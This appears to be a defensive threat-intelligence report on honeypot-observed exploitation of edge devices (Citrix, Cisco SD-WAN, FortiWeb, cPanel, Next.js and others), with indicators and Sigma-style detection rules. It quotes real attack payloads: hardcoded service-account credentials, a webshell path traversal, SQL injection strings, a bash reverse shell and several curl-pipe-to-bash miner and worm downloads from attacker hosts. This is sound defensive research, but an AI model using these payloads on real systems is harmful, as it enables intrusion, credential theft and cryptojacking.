Detection Chokepoints
  • Chokepoints
  • Attack Chains
  • Trends
    • ClickFix Delivery
    • Edge Exploits
    • Masq Infra
  • Framework
  • Contribute
Detection Chokepoints
Chokepoints Attack Chains
ClickFix Delivery Edge Exploits Masq Infra
Framework Contribute↗
  • Overview
  • Framework
  • Volume
  • Recon vs Exploit
  • Targets
    • SD-WAN
    • CitrixBleed
    • SAP
    • SonicWall
    • FortiWeb
    • Ivanti
    • cPanel
    • Next.js
    • F5
  • Scanners
  • Staging
  • Provenance
  • Detections

Edge Device Exploit Trends: Honeypot Analysis

Data: Defused Cyber honeypot telemetry, high and critical severity alerts only  ·  Period: Mar 14 - May 19, 2026 (two export windows, 6-day gap Apr 14-18)  ·  25,420 exploit attempts  ·  Generated: 2026-06-14

25.4k
Exploit attempts
25+
Decoy types
50+
CVEs targeted
11,145
CitrixBleed 2
2,683
Next.js RCE (new)
1,515
cPanel WHM chain

Detection Chokepoint Framework

Every exploit in this dataset (Cisco SD-WAN, Citrix, SonicWall, Fortinet) follows the same chain. The CVE changes. The tooling changes. The five stages don't. Each badge maps to the ATT&CK technique you're detecting at that stage.

Recon / Fingerprint
Scanners probe for version, endpoint presence
T1595 RECON
›
Auth bypass / Memory leak
Exploit hits auth endpoint to gain access or leak tokens
T1190 AUTH BYPASS
›
Credential / Config harvest
Read DCA creds, session tokens, admin configs
T1555 CRED HARVEST
›
Webshell / Payload deploy
Upload .war, drop shell, path-traversal write
T1505 WEBSHELL
›
Post-exploit
Cryptominer, reverse shell, lateral movement
T1059 POST-EXPLOIT

Authentication bypass, credential harvest, and webshell deployment: those three stages are where your detection budget compounds. Recon scanning generates volume but the attacker can change tools and IPs freely. Post-exploit behavior matters but varies by environment. The middle three are the invariants.

Monthly Volume: Daily Exploit Attempts

Daily hit volume across 22 decoy types. The spikes aren't gradual trends. They're specific campaigns lighting up.

Daily exploit attempts. Mar 14 – May 19, 2026 (gap Apr 14–18 = no export data; May 19* = export cutoff artifact)
Three stories dominate this window. April 6 was the peak day at 1,862 hits, driven almost entirely by CitrixBleed 2 with new operators joining daily. April 2 (1,807) and April 9 (1,018) were close behind. March 17 (1,194) was a concentrated SD-WAN burst. The new story: SAP lit up Apr 9–11 with a 1,024-hit burst on a 4-year-old CVSS 10.0 vulnerability, 176 unique IPs in 72 hours. CitrixBleed 2 now accounts for 54% of all traffic in this window, and the operator count keeps growing.

Recon vs. Exploitation: The Early-Warning Window

Every alert in this window is one of two things: weaponized exploitation ("Vulnerability Exploited") or targeted recon — probing, vuln-checks, and exposure scans against a specific CVE. In the Apr 19 - May 19, 2026 window the split is 67% exploitation / 33% recon. Recon usually arrives first, so the gap between the two is a lead indicator: when probing for a CVE ramps, weaponization tends to follow.

Daily weaponized exploitation vs. targeted recon. Apr 19 - May 19, 2026 (high/critical severity).
Volume isn't weaponization. A target can rank high by raw hits while almost all of it is still probing. The exploit/recon split shows where attackers are committed versus where they're still looking — and the lead-time table below shows how much warning that looking gives you.

Where Recon Preceded Exploitation

CVEs where probing was observed before the first weaponized hit. Lead times are lower bounds within the export window — a CVE already active at the window start shows no lead.

CVEFirst reconFirst exploitLeadExploit hits
CVE-2025-551822026-04-192026-04-256d30
CVE-2023-467472026-04-222026-04-264d113
CVE-2025-44272026-04-272026-04-292d24

Target Distribution: What Adversaries Are Hunting

Combined across both observation windows. Citrix still dominates at 47% of all traffic, but the composition has shifted: React Server (CVE-2025-55182) and cPanel/WHM (CVE-2026-41940) are brand-new targets that didn't appear in the first window at all. FortiWeb doubled. SD-WAN and SAP burned hot then cooled - classic burst-campaign behavior.

Citrix NetScaler
11,995
React Server
2,683
FortiWeb
2,037
cPanel WHM
1,515
Cisco SD-WAN
1,383
SAP Netweaver
1,341
Ivanti Connect Secure
1,035
SonicWall SMA
834

CVE-2026-20127: Full Kill Chain in Honeypot Data

CVSS 10.0 authentication bypass in Cisco Catalyst SD-WAN. Disclosed Feb 25, 2026. CISA KEV with 24-hour remediation. We captured the full attack chain: 137 IPs progressing from recon through auth bypass, webshell upload, and cryptominer deployment.

Attack Chain Stages: Observed in Honeypot

StageAlertHitsUnique IPsKey Artifact
RECONAssociated with CVE-2026-201272,475189cmd.jsp probe, .dca credential read
AUTHCVE-2026-20127 [First Part]664123POST /jts/authenticated/j_security_check
UPLOADCVE-2026-20127 [Upload]11144Path traversal → .war webshell deploy
EXECWebshell command execution1,780-POST /cmd.gz/cmd.jsp

Auth Bypass: Hardcoded DCA Credentials

The "First Part" stage sends authentication requests using the viptela-reserved-dca service account, a default internal account used by the Data Collection Agent.

# Auth bypass via default service account POST /jts/authenticated/j_security_check Content-Type: application/x-www-form-urlencoded User-Agent: python-requests/2.32.5 j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk

Webshell Upload: Path Traversal to Wildfly

Post-authentication, attackers exploit the /dataservice/smartLicensing/uploadAck endpoint to upload .war files via path traversal into the Wildfly deployment directory.

# Webshell upload via path traversal POST /dataservice/smartLicensing/uploadAck Content-Type: multipart/form-data filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"

Webshell Commands: Post-Exploit Activity

Once the webshell is deployed at /cmd.gz/cmd.jsp, attackers execute commands through POST requests. The command breakdown reveals a clear operational progression: enumeration → miner deployment → persistence.

CountCommandPurpose
819idUser context check
372curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bashMINER Custom kernel payload
196whoamiUser context check
37curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bashMINER XMRig via MoneroOcean
15curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bashBOTNET Unknown payload
10curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bashBOTNET Compromised WP staging
6uname -a;cat /etc/shadow;cat /etc/passwd;ifconfig -a;...RECON Full system enumeration
5gs-netcat_linux-x86_64 -s kikdddsdsrrds -l -iC2 Global Socket reverse shell
Most of this is cryptomining. Watch the outliers. 819 id commands, 372 XMRig deployments: noisy, opportunistic, easy to catch. But 6 IPs ran full system enumeration and 5 deployed gs-netcat reverse shells. Those are the ones that matter.

Credential Harvesting: DCA Config Files

739 requests targeted the .dca (Data Collection Agent) configuration file. This file contains credentials used by the DCA service to authenticate to vManage. Harvesting this file gives attackers legitimate credentials for lateral movement within the SD-WAN fabric.

CVE-2025-5777: CitrixBleed 2 (T1190 Pre-Auth Memory Disclosure)

Same vulnerability class as the original CitrixBleed that hit Boeing and ICBC. Pre-auth memory disclosure, ~127 bytes per request, session tokens leak out. The exploit is trivial: a 5-byte POST body with the word login. This window: 8,112 hits, 54% of all traffic, still growing.

Exploitation Pattern

All 8,112 hits target a single endpoint: POST /p/u/doAuthentication.do with a malformed login parameter (no equals sign or value). 97% of traffic uses an identical truncated User-Agent string, indicating a shared exploit toolkit spreading to new operators.

# CitrixBleed 2 memory leak exploit POST /p/u/doAuthentication.do HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 5 login
New operators every day, same toolkit. 163[.]245[.]210[.]213 leads at 2,136 hits across this window, grinding continuously. 91[.]92[.]243[.]126 (1,558) and 91[.]92[.]243[.]11 (1,129) are in the same /24 running in parallel. 69[.]169[.]107[.]93 (691), 64[.]20[.]48[.]21 (502), and 178[.]16[.]55[.]226 (452) all appeared in the Apr 2–6 burst. Apr 6 (1,726 CitrixBleed 2 hits) is the new single-day peak. This isn't one campaign. It's a toolkit that anyone can pick up.

CitrixBleed 2 Daily Exploitation Trend

CVE-2025-5777 daily exploitation. Mar 14 to Apr 13, 2026

CVE-2022-22536 + CVE-2025-31324: SAP Surge (Apr 9–11)

SAP jumped from a footnote to the third most targeted platform in this window. 1,179 total hits on SAP Netweaver decoys, driven by a concentrated 72-hour burst Apr 9–11 on CVE-2022-22536, a 2022 CVSS 10.0 memory corruption / request smuggling vulnerability in SAP ICM. An additional 155 hits targeted CVE-2025-31324, the critical SAP NetWeaver Visual Composer RCE disclosed in 2025.

CVE-2022-22536: 4-Year-Old CVSS 10.0 Still Under Active Exploitation

The Apr 9–11 burst hit 176 unique IPs in three days: concentrated scanning across a wide source range rather than a single operator. CVE-2022-22536 allows unauthenticated HTTP request smuggling against SAP ICM, enabling memory disclosure and session token theft without credentials. Patched in 2022. Still getting 1,024 hits in a 31-day window in 2026.

DateHitsCVENotes
Apr 9337CVE-2022-22536Burst begins. 176 unique IPs
Apr 10621CVE-2022-22536Peak day. Scanning at scale
Apr 1166CVE-2022-22536Tail-off
Various155CVE-2025-31324SAP NetWeaver Visual Composer RCE
Old CVEs don't retire. They get rediscovered. CVE-2022-22536 is 4 years old, CVSS 10.0, and requires no credentials. The Apr 9–11 burst pattern (176 IPs, 958 hits in 48 hours, then gone) matches a coordinated scanning campaign, not opportunistic noise. CVE-2019-11510 (Pulse Secure, 7 years old) and CVE-2018-13379 (FortiGate, 8 years old) also appear in this dataset. Patch age is not a proxy for exploitation risk.

CVE-2025-40599: SonicWall SMA Path Traversal + Self-Replicating Worm

478 attempts across 284 unique IPs targeting SonicWall SMA decoys via double-encoded path traversal to reach /bin/sh. Every request uses the libredtail-http User-Agent, a custom HTTP client not seen in any other campaign. 284 unique IPs is the most distributed attacker base of any campaign in this dataset.

# Path traversal to shell + self-replicating worm payload POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh User-Agent: libredtail-http Content-Type: text/plain (wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep
apache.selfrep: this payload spreads itself. The script takes apache.selfrep as an argument, with self-replication logic baked into the payload. The same staging IP (31[.]57[.]216[.]121) appears in both the SonicWall path traversal and the "Shell eval!" alerts across Ivanti, Citrix, and FortiClient EMS decoys, confirming a single worm operator targeting multiple edge device families simultaneously. All 30 shell eval hits still point to this same IP. The worm infrastructure remains active for the entire 31-day observation period.

CVE-2025-25257: FortiWeb Multi-Stage SQLi via Bearer Token

237 requests targeting FortiWeb's /api/fabric/device/status endpoint. Attackers embed SQL injection payloads inside the Authorization: Bearer header, an unusual injection point that bypasses WAF rules typically inspecting query parameters and POST bodies.

CVE-2026-21643: FortiClient EMS SQLi, New Operator Fingerprint (Apr 2)

FortiClient EMS SQLi jumped from 159 to 187 hits (+28 on Apr 2). A new operator fingerprint emerged: payloads containing alireza_cve_2026_21643_test appeared alongside the existing nuclei_cve_2026_21643_test pattern.

# New operator fingerprint: alireza variant (first seen Mar 29) GET /api/v1/init_consts HTTP/1.1 User-Agent: python-requests/2.31.0 Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)-- # Original Nuclei operator (ongoing since March) GET /api/v1/init_consts HTTP/1.1 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Site: x'; SELECT CAST('nuclei_cve_2026_21643_test' AS int)--

Attack Progression

StepPayload (in Bearer token)Purpose
1bitsight-internet-census' or 'x'='xAuth bypass / boolean blind SQLi test
2SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'Write webshell via SQL INTO OUTFILE
3-6UPDATE a SET a=(SELECT CONCAT(a, 0x...))Staged hex payload assembly into DB field
Bearer headers are a WAF blind spot. Most rules inspect URI paths, query strings, and POST bodies. The Authorization header gets passed through uninspected. The webshell lands in /var/log/lib/python3.10/pylab.py, a Python library path that won't trigger file integrity monitoring. If you're not inspecting auth headers for SQL metacharacters, you're missing this entire class.

CVE-2026-1281 / CVE-2026-1340: Ivanti EPMM Reverse Shell (Apr 3)

5 requests on Apr 3 targeting Ivanti EPMM via the /mifs/c/appstore/fob/ endpoint. The payload embeds a bash reverse shell directly in the URL path using backtick command injection inside the sha256 hash parameter.

# Decoded URI: reverse shell injected into app store download path GET /mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1337133713, h=gPath[`bash -i >& /dev/tcp/5[.]255[.]120[.]46/5555 0>&1`] /13371337-1337-1337-1337-133713371337.ipa # C2 callback: 5[.]255[.]120[.]46:5555 # Source IPs: 147[.]185[.]135[.]0/24 range (3 IPs), 185[.]190[.]141[.]49
PoC testing, not a mature campaign. Three IPs in the same /24, 1337 repeating in the GUID and epoch. This is someone running a proof of concept. The actionable IOC is 5[.]255[.]120[.]46:5555. Any outbound connection from an EPMM host to that address is confirmed compromise.

CVE-2019-19781: 6-Year-Old Citrix Vuln Still Getting Probed (Apr 3)

2 hits probing for CVE-2019-19781, a path traversal in Citrix ADC first disclosed December 2019. This CVE is 6+ years old and still being actively probed, reinforcing that edge device vulnerabilities have extremely long exploitation tails.

CVE-2025-64446: FortiWeb API Path Traversal (Apr 2 Spike)

FortiWeb path traversal exploitation jumped to 63 hits, with 22 new attempts on Apr 2 from two IPs in the same 101[.]71[.]38[.]0/24 netblock. The exploit abuses URL-encoded %3f (question mark) in the API path to traverse to /cgi-bin/fwbcgi.

# FortiWeb API path traversal via encoded ? character GET /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: application/json, text/javascript, */*; q=0.01

CVE-2026-41940: cPanel WHM Authentication Bypass (3-Stage Chain)

1,515 hits on cPanel/WHM decoys across a 3-stage exploitation chain. Stage 1 mints a session token via an intentionally wrong password - the bug causes the server to issue a valid session cookie despite authentication failure. Stage 2 uses that minted session to call /json-api/listaccts, harvesting all hosted account credentials. Stage 3 uses the cache propagation gadget at /scripts2/listaccts to persist access across session expiry. 164 unique IPs hit Stage 1; only 13 progressed to Stage 2, confirming most operators are scanning rather than doing full account takeover.

StageAlertHitsUnique IPsKey Artifact
AUTHCVE-2026-41940 – Preauth Session Mint1,223164POST /login/?login_only=1 with wrong credentials via Go-http-client
HARVESTCVE-2026-41940 – Authenticated json-api Call18913GET /cpsess.../json-api/listaccts with minted session cookie
PERSISTCVE-2026-41940 – Cache Propagation Gadget10316GET /scripts2/listaccts or /cpsess.../scripts2/listaccts
# Stage 1: Session mint via deliberate auth failure POST /login/?login_only=1 HTTP/1.1 Host: target:2087 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded pass=wrong&user=root # Stage 2: Account credential harvest using minted session GET /cpsess9999999999/json-api/listaccts HTTP/1.1 Cookie: whostmgrsession=%3AO8ocYr1usaqivq1j Host: target:2087
The detection window is Stage 1. A POST to /login/?login_only=1 returning a session token despite a failed password is the invariant. Legitimate WHM logins don't use login_only=1 with intentionally wrong credentials. Any external IP hitting this endpoint is malicious. Log WHM auth endpoints to your SIEM and alert on login_only=1 from non-management IP ranges.

CVE-2025-55182: Next.js Server Actions RCE

2,653 hits on React Server decoys from 292 unique IPs - the most distributed new campaign in this window. The exploit sends a POST / with a Next-Action header and a multipart body to trigger unauthenticated remote code execution in Next.js Server Actions. 97% of requests use Go-http-client/1.1, making User-Agent matching a near-reliable detection layer while it lasts. The extreme distribution (292 IPs for 2,653 hits) suggests a public PoC driving broad opportunistic scanning rather than a single operator campaign.

# CVE-2025-55182: Next.js Server Actions RCE payload POST / HTTP/1.1 Host: target User-Agent: Go-http-client/1.1 Content-Type: multipart/form-data; boundary=ebf1db96fc37e2dc50cc5acaeef3e83a4555dfd6c2d857640316a40a1b31 Next-Action: x Accept-Encoding: gzip --ebf1db96fc37e2dc50cc5acaeef3e83a4555dfd6c2d857640316a40a1b31 Content-Disposition: form-data; name="ACTION_ID" [RCE payload follows in body]
If you're running Next.js 14+ with Server Actions enabled, this is your fire drill. 292 unique IPs scanning in a single month means any unpatched instance is already being probed. The detection signature is highly specific: POST / with Next-Action header from an external IP, Content-Type: multipart/form-data, User-Agent: Go-http-client. Near-zero false positive rate on that combination. Patch first; detect second.

CVE-2022-1388: F5 iControl REST Auth Bypass Resurfaces

314 hits across 10 unique IPs targeting F5 Big-IP decoys via the 2022 iControl REST authentication bypass. All requests use a static forged X-F5-Auth-Token header (ea5641ae55012ddb91da9978663575) and hit /mgmt/tm/util/bash to probe for command execution access. This CVE is 3 years old; the static token is a shared PoC artifact, which means these 10 operators are running the same public exploit tool without modification.

# CVE-2022-1388: forged auth token + bash exec probe POST /mgmt/tm/util/bash HTTP/1.1 X-F5-Auth-Token: ea5641ae55012ddb91da9978663575 Content-Type: application/json {"command": "run", "utilCmdArgs": "-c \"exit \""}
The static token is the detection. X-F5-Auth-Token: ea5641ae55012ddb91da9978663575 is the shared PoC value. Any request to /mgmt/tm/util/bash from an external IP should alert regardless of the token. Any request with this specific token value is confirmed exploit tooling.

Attacker Tooling: Scanner & Automation Fingerprints

38.7% of traffic self-identifies via User-Agent. That's the floor. The other 61% spoof browser UAs but behave like bots.

python-requests
3,088
libredtail-http
442
Go-http-client
307
l9scan (LeakIX)
57
curl
49
ffuf
14

python-requests dominates at 78% of scanner-attributed traffic. libredtail-http is exclusively associated with the SonicWall worm campaign.

Multi-Device Operators: IPs Scanning Across Decoy Types

IPHitsProducts TargetedSignificance
47[.]253[.]5[.]13013Cisco SD-WAN, Citrix, FortiClient, Ivanti, SonicWallMULTI-EXPLOIT Broadest coverage
ASNAS45102 Alibaba (US) Technology Co., Ltd.
Country / CityHong Kong · Hong Kong
HostingUnknown
StatusActive
144[.]31[.]4[.]7053Citrix, FortiGate, FortiWeb, Palo Alto, SolarWindsMULTI-EXPLOIT Fortinet-heavy
ASNAS215730 H2NEXUS LTD
Country / CityPoland · Warsaw
HostingUnknown
StatusActive
82[.]165[.]66[.]8723Citrix, FortiClient, Ivanti, SonicWallMULTI-EXPLOIT Shell eval across all
ASNAS6724 STRATO AG
Country / CityGermany · Berlin
HostingUnknown
StatusActive
103[.]98[.]152[.]233327Cisco SD-WAN (primary)MINER OPS kernel.sh staging host
ASNAS131374 HQG Technology Solutions Joint Stock Company
Country / CityVietnam · Ho Chi Minh City
HostingBulletproof Vietnamese VPS; same host as staging entry ep-st-1
StatusActive
176[.]65[.]139[.]31336Cisco SD-WAN (primary)MINER OPS Full chain: auth→upload→mine
ASNAS214472 Offshore LC
Country / CityThe Netherlands · Kerkrade
HostingBulletproof Offshore-branded Dutch VPS; full kill chain operator
StatusActive

Staging Infrastructure

Payload staging URLs extracted from webshell commands and shell eval payloads.

URL / IPPayloadsTypeBlind Spot
103[.]98[.]152[.]233/wp_plugins/kernel.sh386MINERPath mimics WordPress plugin directory
ASNAS131374 HQG Technology Solutions Joint Stock Company
Country / CityVietnam · Ho Chi Minh City
HostingBulletproof Vietnamese VPS, primary cryptominer staging host
StatusActive
31[.]57[.]216[.]121/sh687+WORMSelf-replicating apache.selfrep payload
ASNAS197769 VPS Dedicated LLC
Country / CitySlovenia · Ljubljana
HostingBulletproof Abuse-tolerant VPS, no takedown response in 31-day observation window
StatusActive
raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh37MINERLegitimate GitHub hosting. Cannot block domain
ASNAS54113 Fastly, Inc.
Country / CityUnited States · San Francisco
HostingCDN GitHub / Fastly CDN. Cannot block by IP or domain.
StatusActive
83[.]142[.]209[.]4725BOTNETServes nullnet_bash.sh. Botnet enrollment
ASNAS205759 Ghosty Networks LLC
Country / CityLuxembourg · Luxembourg
HostingBulletproof Abuse-tolerant Luxembourg VPS, serves nullnet_bash.sh botnet payload
StatusActive
miso88[.]tech/wp-config/x10BOTNETCompromised domain, WP config path
ASNAS13335 Cloudflare, Inc.
Country / CityUnited States · San Francisco (Cloudflare proxy - origin hidden)
HostingCompromised Legitimate site abused as staging host; origin IP masked by Cloudflare
StatusUnknown
213[.]139[.]77[.]117:443310C2 CHECKPort 4433 callback. Connectivity test before C2
ASNAS398256 Ultahost, Inc.
Country / CityUnited States · New York City
HostingBulletproof Abuse-tolerant VPS; port 4433 C2 callback
StatusActive
5[.]255[.]120[.]46:55555REVERSE SHELLIvanti EPMM bash reverse shell target (Apr 3)
ASNAS60404 The Infrastructure Group B.V.
Country / CityThe Netherlands · Dronten
HostingBulletproof Abuse-tolerant Dutch VPS; reverse shell listener on port 5555
StatusActive
You can't block GitHub. Detection has to be contextual. A network appliance fetching shell scripts from raw.githubusercontent.com and piping to bash is anomalous regardless of the domain reputation.

Hosting Provenance: Where the Traffic Originates

Every attacker IP resolved to its hosting ASN (Team Cymru, cross-checked against IPinfo). This is where the exploit traffic is hosted — and watching the mix shift month over month is how abuse-tolerant / bulletproof rotation surfaces. 1029 cumulative unique source IPs across Apr 2026 - May 2026.

Exploit events by hosting ASN, per month. Apr 2026 - May 2026.
The hosting rotates even when the exploit doesn't. Tracking which ASNs carry the traffic — and which are abuse-tolerant — is more durable than chasing individual IPs, which churn constantly. Bulletproof-labeled networks are flagged below; the map is analyst-curated and grows as new hosters appear.
Hosting / ASN orgASNEventsClass
H2NEXUS LTDAS2157303,110
Amazon.com, Inc.AS165091,049
No.31,Jin-rong StreetAS4134883
DigitalOcean, LLCAS14061498
Hurricane Electric LLCAS6939452
The Constant Company, LLCAS20473357
TechTies Inc.AS197170334
VPSVAULT.HOST LTDAS215925253
Tianfeng (Hong Kong) CommuniAS213802245
PacketHub S.A.AS147049209

Detection Recommendations

Each detection maps to the technique it catches. The ones that survived every CVE rotation in this dataset are at the top.

T1190
Detect SD-WAN auth bypass via default service accounts
Alert on authentication attempts using viptela-reserved-dca or any viptela-reserved-* account from external IPs. These are internal service accounts. External auth requests are always malicious.
Observed payloads (1)
# 664 hits, 123 unique IPs. Default DCA service account, external source. POST /jts/authenticated/j_security_check HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: python-requests/2.32.5 j_username=viptela-reserved-dca&j_password=9i9Q6TE1TYVMdUu6ULw9W5kkSoaP6Czk
Example detection logic
# Sigma-style detection title: Cisco SD-WAN Auth Bypass via Default DCA Account logsource: category: webserver product: cisco_sdwan detection: selection: cs-uri-stem|contains: '/jts/authenticated/j_security_check' request_body|contains: 'viptela-reserved-dca' filter_internal: src_ip|cidr: - '10.0.0.0/8' - '172.16.0.0/12' - '192.168.0.0/16' condition: selection and not filter_internal level: critical
T1505
Detect webshell upload via Wildfly deployment path traversal
Monitor for multipart uploads containing path traversal sequences targeting /var/lib/wildfly/standalone/deployments/.
Observed payloads (1)
# 111 upload attempts, 44 unique IPs. Path traversal deploys .war webshell at /cmd.gz. POST /dataservice/smartLicensing/uploadAck HTTP/1.1 Content-Type: multipart/form-data filename="../../../../../../../../../../../var/lib/wildfly/standalone/deployments/cmd.gz.war"
Example detection logic
# Sigma-style: Webshell upload to Wildfly title: SD-WAN Webshell Upload via Path Traversal logsource: category: webserver detection: selection_endpoint: cs-uri-stem|contains: '/dataservice/smartLicensing/uploadAck' cs-method: 'POST' selection_traversal: request_body|contains: - '../../../' - 'deployments/' - '.war' condition: selection_endpoint and selection_traversal level: critical
T1190
Detect CitrixBleed 2 memory leak exploitation
The exploit signature is highly specific: POST /p/u/doAuthentication.do with a body containing only login (no equals sign, no value). Legitimate authentication always includes login=username. Near-zero false positive potential.
Observed payloads (1)
# 8,112 hits, 54% of all traffic. 5-byte body, malformed login parameter. POST /p/u/doAuthentication.do HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Content-Type: application/x-www-form-urlencoded Content-Length: 5 login
Example detection logic
# Sigma-style: CitrixBleed 2 memory disclosure title: Citrix NetScaler CVE-2025-5777 Memory Leak Attempt logsource: category: webserver product: citrix_netscaler detection: selection: cs-uri-stem: '/p/u/doAuthentication.do' cs-method: 'POST' sc-bytes|lt: 20 condition: selection level: critical falsepositives: - None expected. Legitimate auth always includes credentials
T1190
Detect SQL injection in Authorization headers
The FortiWeb campaign embeds SQLi in Bearer tokens, a common WAF bypass. Inspect Authorization headers for SQL metacharacters.
Observed payloads (3)
# FortiWeb Bearer-token SQLi: auth bypass probe (boolean blind). GET /api/fabric/device/status HTTP/1.1 Authorization: Bearer bitsight-internet-census' or 'x'='x # FortiWeb Bearer-token SQLi: webshell drop via INTO OUTFILE. GET /api/fabric/device/status HTTP/1.1 Authorization: Bearer ' UNION SELECT a FROM fabric_user.a INTO OUTFILE '/var/log/lib/python3.10/pylab.py'-- # FortiClient EMS SQLi: operator-fingerprint variant (Site header). GET /api/v1/init_consts HTTP/1.1 User-Agent: python-requests/2.31.0 Site: x'; SELECT CAST('alireza_cve_2026_21643_test' AS int)--
Example detection logic
# Sigma-style: SQLi via Authorization header title: SQL Injection in HTTP Authorization Header logsource: category: webserver detection: selection: cs-authorization|contains: - 'SELECT' - 'UNION' - 'INTO OUTFILE' - 'CONCAT' - '/**/' - "' or '" condition: selection level: high
T1059
Detect edge devices fetching scripts and piping to shell
Network appliances should not execute wget|curl ... | sh chains. Monitor for outbound HTTP(S) from edge device management IPs followed by shell execution.
Observed payloads (5)
# 372 hits. XMRig miner delivery via direct-IP staging host. curl -s -Lk hxxps[://]103[.]98[.]152[.]233/wp_plugins/kernel.sh | bash # 37 hits. MoneroOcean miner via legitimate-looking GitHub raw path. curl -s -L hxxps[://]raw[.]githubusercontent[.]com/.../setup_moneroocean_miner.sh | bash # 15 hits. Unknown botnet payload over HTTP. curl -sLk hxxp[://]83[.]142[.]209[.]47/x | bash # 10 hits. Compromised WordPress site hosting second-stage dropper. curl -s -Lk hxxps[://]miso88[.]tech/wp-config/x | bash # SonicWall worm: self-replicating payload with wget/curl fallback. (wget --no-check-certificate -qO- hxxps[://]31[.]57[.]216[.]121/sh || curl -sk hxxps[://]31[.]57[.]216[.]121/sh) | sh -s apache.selfrep
Example detection logic
# Sigma-style: Edge device pipe-to-shell title: Edge Device Fetches Remote Script and Pipes to Shell logsource: category: process_creation product: linux detection: selection_fetch: CommandLine|contains: - 'wget' - 'curl' selection_pipe: CommandLine|contains: - '| sh' - '| bash' - '| /bin/sh' filter_package_managers: ParentImage|endswith: - '/apt' - '/yum' - '/dnf' condition: selection_fetch and selection_pipe and not filter_package_managers level: high
INFRA
Monitor for DCA credential file access on SD-WAN
739 requests targeted the .dca config file path. Access to this file from any non-management IP indicates credential harvesting, the lateral movement enabler.
Observed payloads (2)
# 739 hits. Direct .dca config read, credentials used by DCA service to auth to vManage. GET /data-collection-agent/.dca HTTP/1.1 User-Agent: python-requests/2.32.5 # Related probe for DCA config directory. GET /config/data-collection-agent/ HTTP/1.1 User-Agent: python-requests/2.32.5
Example detection logic
# Sigma-style: DCA credential file access title: Cisco SD-WAN DCA Config File Access logsource: category: webserver product: cisco_sdwan detection: selection: cs-uri-stem|contains: - '/data-collection-agent/.dca' - '/config/data-collection-agent/' condition: selection level: critical
Detection Chokepoints - community detection engineering resource GitHub Contribute MITRE ATT&CK